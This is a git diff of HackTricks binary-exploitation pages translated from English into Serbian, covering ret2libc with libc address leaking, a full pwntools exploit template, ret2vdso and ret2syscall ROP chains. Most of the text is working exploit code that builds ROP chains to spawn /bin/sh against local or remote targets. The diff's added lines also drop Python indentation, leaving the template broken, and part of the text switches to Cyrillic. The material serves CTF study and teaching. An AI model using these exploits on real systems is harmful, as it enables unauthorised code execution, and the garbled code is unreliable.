+Možete pretražiti koja biblioteka se koristi na veb stranici: [https://libc.blukat.me/](https://libc.blukat.me)\
+Takođe će vam omogućiti da preuzmete otkrivenu verziju **libc**
 
 ![](<../../../../images/image (221).png>)
 
-### 3.2- Searching for libc version (2)
+### 3.2- Pretraživanje verzije libc (2)
 
-You can also do:
+Takođe možete uraditi:
 
 - `$ git clone https://github.com/niklasb/libc-database.git`
 - `$ cd libc-database`
 - `$ ./get`
 
-This will take some time, be patient.\
-For this to work we need:
+Ovo će potrajati, budite strpljivi.\
+Za ovo da bi radilo potrebni su nam:
 
-- Libc symbol name: `puts`
-- Leaked libc adddress: `0x7ff629878690`
-
-We can figure out which **libc** that is most likely used.
+- Ime libc simbola: `puts`
+- Otkazana libc adresa: `0x7ff629878690`
 
+Možemo da utvrdimo koja **libc** se najverovatnije koristi.
 ```bash
 ./find puts 0x7ff629878690
 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
 archive-glibc (id libc6_2.23-0ubuntu11_amd64)
 ```
-
-We get 2 matches (you should try the second one if the first one is not working). Download the first one:
-
+Dobijamo 2 podudaranja (trebalo bi da probate drugo ako prvo ne radi). Preuzmite prvo:
 ```bash
 ./download libc6_2.23-0ubuntu10_amd64
 Getting libc6_2.23-0ubuntu10_amd64
-  -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-  -> Downloading package
-  -> Extracting package
-  -> Package saved to libs/libc6_2.23-0ubuntu10_amd64
+-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
+-> Downloading package
+-> Extracting package
+-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
 ```
+Kopirajte libc iz `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` u naš radni direktorijum.
 
-Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
-
-### 3.3- Other functions to leak
-
+### 3.3- Druge funkcije za leak
 ```python
 puts
 printf
@@ -198,28 +181,24 @@ __libc_start_main
 read
 gets
 ```
+## 4- Pronalaženje libc adrese zasnovane na i iskorišćavanje
 
-## 4- Finding based libc address & exploiting
+U ovom trenutku treba da znamo koja se libc biblioteka koristi. Pošto iskorišćavamo lokalni binarni fajl, koristiću samo: `/lib/x86_64-linux-gnu/libc.so.6`
 
-At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
+Dakle, na početku `template.py` promenite **libc** promenljivu na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Postavite putanju do biblioteke kada je znate`
 
-So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
-
-Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**.
-
-Inside the `get_addr`function the **base address of libc** is going to be calculated:
+Davanjem **putanje** do **libc biblioteke**, ostatak **eksploata će biti automatski izračunat**.
 
+Unutar `get_addr` funkcije, **osnovna adresa libc** će biti izračunata:
 ```python
 if libc != "":
-    libc.address = leak - libc.symbols[func_name] #Save libc base
-    log.info("libc base @ %s" % hex(libc.address))
+libc.address = leak - libc.symbols[func_name] #Save libc base
+log.info("libc base @ %s" % hex(libc.address))
 ```
-
 > [!NOTE]
-> Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library.
-
-Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
+> Imajte na umu da **konačna libc osnovna adresa mora završavati sa 00**. Ako to nije vaš slučaj, možda ste iscurili pogrešnu biblioteku.
 
+Zatim, adresa funkcije `system` i **adresa** do stringa _"/bin/sh"_ će biti **izračunate** iz **osnovne adrese** **libc** i date **libc biblioteci.**
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
 SYSTEM = libc.sym["system"]
@@ -228,9 +207,7 @@ EXIT = libc.sym["exit"]
 log.info("bin/sh %s " % hex(BINSH))
 log.info("system %s " % hex(SYSTEM))
 ```
-
-Finally, the /bin/sh execution exploit is going to be prepared sent:
-
+Konačno, eksploit za izvršavanje /bin/sh će biti pripremljen i poslat:
 ```python
 rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
 
@@ -240,65 +217,56 @@ p.sendline(rop2)
 #### Interact with the shell #####
 p.interactive() #Interact with the conenction
 ```
+Hajde da objasnimo ovaj konačni ROP.\
+Poslednji ROP (`rop1`) je ponovo pozvao glavnu funkciju, tako da možemo **ponovo iskoristiti** **overflow** (zato je `OFFSET` ovde ponovo). Zatim, želimo da pozovemo `POP_RDI` koji pokazuje na **adresu** _"/bin/sh"_ (`BINSH`) i pozovemo **system** funkciju (`SYSTEM`) jer će adresa _"/bin/sh"_ biti prosleđena kao parametar.\
+Na kraju, **adresa funkcije exit** je **pozvana** tako da proces **izlazi lepo** i ne generiše se nikakva upozorenja.
 
-Let's explain this final ROP.\
-The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
-Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
-
-**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
+**Na ovaj način, exploit će izvršiti \_/bin/sh**\_\*\* shell.\*\*
 
 ![](<../../../../images/image (165).png>)
 
-## 4(2)- Using ONE_GADGET
+## 4(2)- Korišćenje ONE_GADGET
 
-You could also use [**ONE_GADGET** ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\
-However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
+Takođe možete koristiti [**ONE_GADGET** ](https://github.com/david942j/one_gadget) da dobijete shell umesto korišćenja **system** i **"/bin/sh". ONE_GADGET** će pronaći unutar libc biblioteke neki način da dobije shell koristeći samo jednu **ROP adresu**.\
+Međutim, obično postoje neka ograničenja, najčešća i lako izbegnuta su kao `[rsp+0x30] == NULL`. Pošto kontrolišete vrednosti unutar **RSP**, samo treba da pošaljete još nekoliko NULL vrednosti kako bi se ograničenje izbeglo.
 
 ![](<../../../../images/image (754).png>)
-
 ```python
 ONE_GADGET = libc.address + 0x4526a
 rop2 = base + p64(ONE_GADGET) + "\x00"*100
 ```
-
 ## EXPLOIT FILE
 
-You can find a template to exploit this vulnerability here:
+Možete pronaći šablon za iskorišćavanje ove ranjivosti ovde:
 
 {{#ref}}
 rop-leaking-libc-template.md
 {{#endref}}
 
-## Common problems
+## Uobičajeni problemi
 
-### MAIN_PLT = elf.symbols\['main'] not found
-
-If the "main" symbol does not exist. Then you can find where is the main code:
+### MAIN_PLT = elf.symbols\['main'] nije pronađen
 
+Ako simbol "main" ne postoji. Tada možete pronaći gde je glavni kod:
 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
 0000000000401080 <.text>:
 ```
-
-and set the address manually:
-
+i ručno postavite adresu:
 ```python
 MAIN_PLT = 0x401080
 ```
+### Puts nije pronađen
 
-### Puts not found
+Ako binarni fajl ne koristi Puts, trebali biste proveriti da li koristi
 
-If the binary is not using Puts you should check if it is using
+### `sh: 1: %s%s%s%s%s%s%s%s: nije pronađen`
 
-### `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-Try to **subtract 64 bytes to the address of "/bin/sh"**:
+Ako pronađete ovu **grešku** nakon što ste kreirali **sve** eksploite: `sh: 1: %s%s%s%s%s%s%s%s: nije pronađen`
 
+Pokušajte da **oduzmete 64 bajta od adrese "/bin/sh"**:
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index def2864f4..c375e3cd1 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -1,11 +1,6 @@
-# Leaking libc - template
+# Curjenje libc - šablon
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

-
-{% embed url="https://websec.nl/" %}
-
 ```python:template.py
 from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64  # Import pwntools
 
@@ -25,25 +20,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
 ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
 
 if LOCAL:
-    P = process(LOCAL_BIN, env=ENV) # start the vuln binary
-    ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-    ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+P = process(LOCAL_BIN, env=ENV) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
 elif REMOTETTCP:
-    P = remote('10.10.10.10',1339) # start the vuln binary
-    ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-    ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+P = remote('10.10.10.10',1339) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
 elif REMOTESSH:
-    ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
-    p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
-    elf = ELF(LOCAL_BIN)# Extract data from binary
-    rop = ROP(elf)# Find ROP gadgets
+ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+elf = ELF(LOCAL_BIN)# Extract data from binary
+rop = ROP(elf)# Find ROP gadgets
 
 if GDB and not REMOTETTCP and not REMOTESSH:
-    # attach gdb and continue
-    # You can set breakpoints, for example "break *main"
-    gdb.attach(P.pid, "b *main")
+# attach gdb and continue
+# You can set breakpoints, for example "break *main"
+gdb.attach(P.pid, "b *main")
 
 
 
@@ -53,15 +48,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
 
 OFFSET = b"" #b"A"*264
 if OFFSET == b"":
-    gdb.attach(P.pid, "c") #Attach and continue
-    payload = cyclic(264)
-    payload += b"AAAAAAAA"
-    print(P.clean())
-    P.sendline(payload)
-    #x/wx $rsp -- Search for bytes that crashed the application
-    #print(cyclic_find(0x63616171)) # Find the offset of those bytes
-    P.interactive()
-    exit()
+gdb.attach(P.pid, "c") #Attach and continue
+payload = cyclic(264)
+payload += b"AAAAAAAA"
+print(P.clean())
+P.sendline(payload)
+#x/wx $rsp -- Search for bytes that crashed the application
+#print(cyclic_find(0x63616171)) # Find the offset of those bytes
+P.interactive()
+exit()
 
 
 
@@ -69,11 +64,11 @@ if OFFSET == b"":
 ### Find Gadgets ###
 ####################
 try:
-    libc_func = "puts"
-    PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
+libc_func = "puts"
+PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
 except:
-    libc_func = "printf"
-    PUTS_PLT = ELF_LOADED.plt['printf']
+libc_func = "printf"
+PUTS_PLT = ELF_LOADED.plt['printf']
 
 MAIN_PLT = ELF_LOADED.symbols['main']
 POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@@ -90,54 +85,54 @@ log.info("ret gadget: " + hex(RET))
 ########################
 
 def generate_payload_aligned(rop):
-    payload1 = OFFSET + rop
-    if (len(payload1) % 16) == 0:
-        return payload1
+payload1 = OFFSET + rop
+if (len(payload1) % 16) == 0:
+return payload1
 
-    else:
-        payload2 = OFFSET + p64(RET) + rop
-        if (len(payload2) % 16) == 0:
-            log.info("Payload aligned successfully")
-            return payload2
-        else:
-            log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
-            return payload1
+else:
+payload2 = OFFSET + p64(RET) + rop
+if (len(payload2) % 16) == 0:
+log.info("Payload aligned successfully")
+return payload2
+else:
+log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
+return payload1
 
 
 def get_addr(libc_func):
-    FUNC_GOT = ELF_LOADED.got[libc_func]
-    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
-    # Create rop chain
-    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
-    rop1 = generate_payload_aligned(rop1)
+FUNC_GOT = ELF_LOADED.got[libc_func]
+log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
+# Create rop chain
+rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+rop1 = generate_payload_aligned(rop1)
 
-    # Send our rop-chain payload
-    #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
-    print(P.clean()) # clean socket buffer (read all and print)
-    P.sendline(rop1)
+# Send our rop-chain payload
+#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
+print(P.clean()) # clean socket buffer (read all and print)
+P.sendline(rop1)
 
-    # If binary is echoing back the payload, remove that message
-    recieved = P.recvline().strip()
-    if OFFSET[:30] in recieved:
-        recieved = P.recvline().strip()
+# If binary is echoing back the payload, remove that message
+recieved = P.recvline().strip()
+if OFFSET[:30] in recieved:
+recieved = P.recvline().strip()
 
-    # Parse leaked address
-    log.info(f"Len rop1: {len(rop1)}")
-    leak = u64(recieved.ljust(8, b"\x00"))
-    log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
+# Parse leaked address
+log.info(f"Len rop1: {len(rop1)}")
+leak = u64(recieved.ljust(8, b"\x00"))
+log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
 
-    # Set lib base address
-    if LIBC:
-        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
-        print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
-        log.info("LIBC base @ %s" % hex(LIBC.address))
+# Set lib base address
+if LIBC:
+LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
+print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
+log.info("LIBC base @ %s" % hex(LIBC.address))
 
-    # If not LIBC yet, stop here
-    else:
-        print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
-        P.interactive()
+# If not LIBC yet, stop here
+else:
+print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
+P.interactive()
 
-    return hex(leak)
+return hex(leak)
 
 get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
 
@@ -150,38 +145,38 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
 ## Via One_gadget (https://github.com/david942j/one_gadget)
 # gem install one_gadget
 def get_one_gadgets(libc):
-        import string, subprocess
-	args = ["one_gadget", "-r"]
-	if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
-		args += ["-b", libc.hex()]
-	else:
-		args += [libc]
-	try:
-	    one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
-	except:
-	    print("One_gadget isn't installed")
-	    one_gadgets = []
-	return
+import string, subprocess
+args = ["one_gadget", "-r"]
+if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
+args += ["-b", libc.hex()]
+else:
+args += [libc]
+try:
+one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
+except:
+print("One_gadget isn't installed")
+one_gadgets = []
+return
 
 rop2 = b""
 if USE_ONE_GADGET:
-    one_gadgets = get_one_gadgets(LIBC)
-    if one_gadgets:
-        rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
+one_gadgets = get_one_gadgets(LIBC)
+if one_gadgets:
+rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
 
 ## Normal/Long exploitation
 if not rop2:
-    BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
-    SYSTEM = LIBC.sym["system"]
-    EXIT = LIBC.sym["exit"]
+BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
+SYSTEM = LIBC.sym["system"]
+EXIT = LIBC.sym["exit"]
 
-    log.info("POP_RDI %s " % hex(POP_RDI))
-    log.info("bin/sh %s " % hex(BINSH))
-    log.info("system %s " % hex(SYSTEM))
-    log.info("exit %s " % hex(EXIT))
+log.info("POP_RDI %s " % hex(POP_RDI))
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+log.info("exit %s " % hex(EXIT))
 
-    rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
-    rop2 = generate_payload_aligned(rop2)
+rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
+rop2 = generate_payload_aligned(rop2)
 
 
 print(P.clean())
@@ -189,41 +184,30 @@ P.sendline(rop2)
 
 P.interactive() #Interact with your shell :)
 ```
+## Uobičajeni problemi
 
-## Common problems
-
-### MAIN_PLT = elf.symbols\['main'] not found
-
-If the "main" symbol does not exist (probably because it's a stripped binary). Then you can just find where is the main code:
+### MAIN_PLT = elf.symbols\['main'] nije pronađen
 
+Ako simbol "main" ne postoji (verovatno zato što je binarni fajl uklonjen). Tada možete jednostavno pronaći gde je glavni kod:
 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
 0000000000401080 <.text>:
 ```
-
-and set the address manually:
-
+i ručno postavite adresu:
 ```python
 MAIN_PLT = 0x401080
 ```
+### Puts не пронађен
 
-### Puts not found
+Ако бинарни фајл не користи Puts, требало би да **проверите да ли користи**
 
-If the binary is not using Puts you should **check if it is using**
+### `sh: 1: %s%s%s%s%s%s%s%s: не пронађен`
 
-### `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-Try to **subtract 64 bytes to the address of "/bin/sh"**:
+Ако нађете ову **грешку** након што сте креирали **све** експлоите: `sh: 1: %s%s%s%s%s%s%s%s: не пронађен`
 
+Пробајте да **одузмете 64 бајта од адресе "/bin/sh"**:
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
-
-

-
-{% embed url="https://websec.nl/" %}
-
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
index a3a6c9ed5..1c4fcec1e 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
@@ -2,12 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-There might be **gadgets in the vDSO region**, which is used to change from user mode to kernel mode. In these type of challenges, usually a kernel image is provided to dump the vDSO region.
-
-Following the example from [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) it's possible to see how it was possible to dump the vdso section and move it to the host with:
+Mogu postojati **gadgets u vDSO regionu**, koji se koristi za prelazak iz korisničkog moda u kernel mod. U ovim vrstama izazova, obično se pruža kernel slika za dumpovanje vDSO regiona.
 
+Prateći primer sa [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) moguće je videti kako je bilo moguće dumpovati vdso sekciju i premestiti je na host sa:
 ```bash
 # Find addresses
 cat /proc/76/maps
@@ -33,9 +32,7 @@ echo '' | base64 -d | gzip -d - > vdso
 file vdso
 ROPgadget --binary vdso | grep 'int 0x80'
 ```
-
-ROP gadgets found:
-
+Pronađeni ROP gadgeti:
 ```python
 vdso_addr = 0xf7ffc000
 
@@ -54,13 +51,12 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb
 # 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret
 pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd
 ```
-
 > [!CAUTION]
-> Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639)
+> Imajte na umu kako bi moglo biti moguće **obići ASLR koristeći vdso** ako je kernel kompajliran sa CONFIG_COMPAT_VDSO, jer adresa vdso neće biti nasumična: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639)
 
 ### ARM64
 
-After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page:
+Nakon dumpovanja i provere vdso sekcije binarnog fajla u kali 2023.2 arm64, nisam mogao pronaći nijedan zanimljiv gadget (nema načina da se kontrolišu registri iz vrednosti na steku ili da se kontroliše x30 za ret) **osim načina da se pozove SROP**. Pogledajte više informacija u primeru sa stranice:
 
 {{#ref}}
 srop-sigreturn-oriented-programming/srop-arm64.md
diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
index 444927dfd..33541c29c 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
@@ -2,26 +2,25 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-This is similar to Ret2lib, however, in this case we won't be calling a function from a library. In this case, everything will be prepared to call the syscall `sys_execve` with some arguments to execute `/bin/sh`. This technique is usually performed on binaries that are compiled statically, so there might be plenty of gadgets and syscall instructions.
+Ovo je slično Ret2lib, međutim, u ovom slučaju nećemo pozivati funkciju iz biblioteke. U ovom slučaju, sve će biti pripremljeno za pozivanje syscall `sys_execve` sa nekim argumentima za izvršavanje `/bin/sh`. Ova tehnika se obično primenjuje na binarne datoteke koje su statički kompajlirane, tako da može biti mnogo gadgeta i syscall instrukcija.
 
-In order to prepare the call for the **syscall** it's needed the following configuration:
+Da bismo pripremili poziv za **syscall**, potrebna je sledeća konfiguracija:
 
-- `rax: 59 Specify sys_execve`
-- `rdi: ptr to "/bin/sh" specify file to execute`
-- `rsi: 0 specify no arguments passed`
-- `rdx: 0 specify no environment variables passed`
+- `rax: 59 Specifikujte sys_execve`
+- `rdi: ptr do "/bin/sh" specifikujte datoteku za izvršavanje`
+- `rsi: 0 specifikujte da nema prosleđenih argumenata`
+- `rdx: 0 specifikujte da nema prosleđenih promenljivih okruženja`
 
-So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
+Dakle, u suštini, potrebno je napisati string `/bin/sh` negde i zatim izvršiti `syscall` (imajući u vidu potrebnu padding za kontrolu steka). Za to nam je potreban gadget da napišemo `/bin/sh` u poznatom području.
 
 > [!TIP]
-> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
+> Još jedan zanimljiv syscall koji se može pozvati je **`mprotect`** koji bi omogućio napadaču da **modifikuje dozvole stranice u memoriji**. Ovo se može kombinovati sa [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
 
-## Register gadgets
-
-Let's start by finding **how to control those registers**:
+## Gadgeti za registre
 
+Hajde da počnemo sa pronalaženjem **kako da kontrolišemo te registre**:
 ```bash
 ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x0000000000415664 : pop rax ; ret
@@ -29,15 +28,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x00000000004101f3 : pop rsi ; ret
 0x00000000004498b5 : pop rdx ; ret
 ```
+Sa ovim adresama je moguće **pisati sadržaj u stek i učitati ga u registre**.
 
-With these addresses it's possible to **write the content in the stack and load it into the registers**.
-
-## Write string
+## Pisanje stringa
 
 ### Writable memory
 
-First you need to find a writable place in the memory
-
+Prvo treba da pronađete mesto u memoriji koje može da se piše
 ```bash
 gef> vmmap
 [ Legend:  Code | Heap | Stack ]
@@ -46,26 +43,20 @@ Start              End                Offset             Perm Path
 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
 ```
-
 ### Write String in memory
 
-Then you need to find a way to write arbitrary content in this address
-
+Zatim treba da pronađete način da upišete proizvoljan sadržaj na ovu adresu
 ```python
 ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
 mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
 ```
+### Automatizujte ROP lanac
 
-### Automate ROP chain
-
-The following command creates a full `sys_execve` ROP chain given a static binary when there are write-what-where gadgets and syscall instructions:
-
+Sledeća komanda kreira kompletan `sys_execve` ROP lanac za dati statički binarni fajl kada postoje write-what-where gadgeti i syscall instrukcije:
 ```bash
 ROPgadget --binary vuln --ropchain
 ```
-
-#### 32 bits
-
+#### 32 bita
 ```python
 '''
 Lets write "/bin/sh" to 0x6b6000
@@ -87,9 +78,7 @@ rop += popRax
 rop += p32(0x6b6000 + 4)
 rop += writeGadget
 ```
-
-#### 64 bits
-
+#### 64 bita
 ```python
 '''
 Lets write "/bin/sh" to 0x6b6000
@@ -105,17 +94,15 @@ rop += popRax
 rop += p64(0x6b6000) # Writable memory
 rop += writeGadget #Address to: mov qword ptr [rax], rdx
 ```
+## Nedostatak Gadžeta
 
-## Lacking Gadgets
-
-If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
+Ako vam **nedostaju gadžeti**, na primer da napišete `/bin/sh` u memoriji, možete koristiti **SROP tehniku da kontrolišete sve vrednosti registara** (uključujući RIP i registre parametara) iz steka:
 
 {{#ref}}
 ../srop-sigreturn-oriented-programming/
 {{#endref}}
 
-## Exploit Example
-
+## Primer Eksploatacije
 ```python
 from pwn import *
 
@@ -182,14 +169,13 @@ target.sendline(payload)
 
 target.interactive()
 ```
-
-## Other Examples & References
+## Ostali Primeri i Reference
 
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
-  - 64 bits, no PIE, nx, write in some memory a ROP to call `execve` and jump there.
+- 64 bita, bez PIE, nx, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo.
 - [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html)
-  - 64 bits, nx, no PIE, write in some memory a ROP to call `execve` and jump there. In order to write to the stack a function that performs mathematical operations is abused
+- 64 bita, nx, bez PIE, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. Da bi se upisalo na stek, zloupotrebljava se funkcija koja vrši matematičke operacije.
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
-  - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
+- 64 bita, bez PIE, nx, BF kanar, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
index 5b912eab8..3affeb1ab 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
@@ -2,80 +2,73 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-Find an introduction to arm64 in:
+Pronađite uvod u arm64 u:
 
 {{#ref}}
 ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
 {{#endref}}
 
-## Code
+## Kod
 
-We are going to use the example from the page:
+Koristićemo primer sa stranice:
 
 {{#ref}}
 ../../stack-overflow/ret2win/ret2win-arm64.md
 {{#endref}}
-
 ```c
 #include 
 #include 
 
 void win() {
